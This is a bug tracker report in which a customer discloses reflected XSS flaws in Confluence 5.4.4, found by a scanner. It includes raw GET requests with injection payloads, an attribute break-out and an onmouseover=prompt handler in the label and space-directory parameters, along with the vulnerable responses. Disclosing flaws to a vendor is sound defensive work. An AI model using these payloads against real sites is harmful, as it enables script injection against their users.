Details
-
Bug
-
Resolution: Fixed
-
Medium
-
5.4.4
-
None
-
Production
-
5.5
-
Description
Good morning,
I wanted to tell you to run vulnerability tests confluence, thrown the same XSS vulnerabilities.
Version tested: 5.4.4
What steps should I follow to fix their vulnerabilities?
Or vulnerabilities will be resolved for you?
I attached the vulnerabilities:
1)
GET /spacedirectory/view.action?selectedSpaceCategory=%27%22+ns%3d+netsparker(0x002414)+ HTTP/1.1
Response:
<div id="space-directory-wrapper">
<nav class="aui-navgroup aui-navgroup-vertical" id="space-directory" data-selected-tab='" ns= netsparker(0x002414) >
<div class="aui-navgroup-inner">
<ul id="space-system-list" class="aui-nav">
2)
GET /labels/viewlabel.action?ids=1703943&ids=589833&ids=2916356&ids=589837&ids=1703945&key=API%22%20onmouseover%3dprompt(927382)%20bad%3d%22 HTTP/1.1
Response:
<li class="aui-label" data-label-id="1703943">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382)
bad="&ids=589837&ids=1703945&ids=589833&ids=2916356">en</a>
</li><li class="aui-label" data-label-id="589833">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=589837&ids=1703945&ids=1703943&ids=2916356">kb-how-to-article</a>
</li><li class="aui-label" data-label-id="2916356">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=589837&ids=1703945&ids=1703943&ids=589833">llamadas</a>
</li><li class="aui-label" data-label-id="589837">
<a class="minus-label" rel="nofollow" href="/labels/viewlabel.action?key=API" onmouseover=prompt(927382) bad="&ids=1703945&ids=1703943&ids=589833&ids=2916356">api</a>
</li><li class="aui-label" data-label-id="1703945">
<a class="minus-label" rel="nofollow" href="/label/API" onmouseover=prompt(927382) bad="/api+en+kb-how-to-article+llamadas">creación</a>
</li>
I remain waiting for a prompt response.
Thanks and regards
Adonis Pate